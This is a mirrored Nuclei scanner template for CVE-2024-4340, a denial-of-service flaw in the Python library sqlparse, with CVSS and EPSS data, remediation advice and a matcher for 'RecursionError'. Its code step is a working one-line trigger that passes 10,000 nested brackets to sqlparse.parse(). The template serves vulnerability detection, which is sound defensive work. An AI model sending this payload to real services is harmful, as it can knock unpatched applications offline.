mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 07:43:27 +08:00
36 lines
1.3 KiB
YAML
36 lines
1.3 KiB
YAML
id: CVE-2024-4340
|
|
|
|
info:
|
|
name: sqlparse - Denial of Service
|
|
author: KoYejune0302,cheoljun99,sim4110,gy741
|
|
severity: high
|
|
description: |
|
|
Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
|
|
impact: |
|
|
Attackers can cause denial of service by sending heavily nested lists to sqlparse.parse(), triggering RecursionError and making the application unresponsive.
|
|
remediation: |
|
|
Upgrade sqlparse to a version later than the affected releases that implements recursion depth limits.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2024-4340
|
|
epss-score: 0.17039
|
|
epss-percentile: 0.94792
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-4340
|
|
tags: cve,cve2024,py,code,dos,python,sqlparse,vuln
|
|
|
|
self-contained: true
|
|
code:
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
python -c "import sqlparse; sqlparse.parse('[' * 10000 + ']' * 10000)"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: stderr
|
|
words:
|
|
- "RecursionError: maximum recursion depth exceeded"
|
|
# digest: 4a0a004730450221009f98d78909b6f53238d8f7c5c40b9a47f69a73be02b922658654e2ac82bc0e5602207ef7aab1cf727623c5a348137916a324b72383452c4af63104fd2ae1a5e30bf3:922c64590222798bb761d5b6d8e72950 |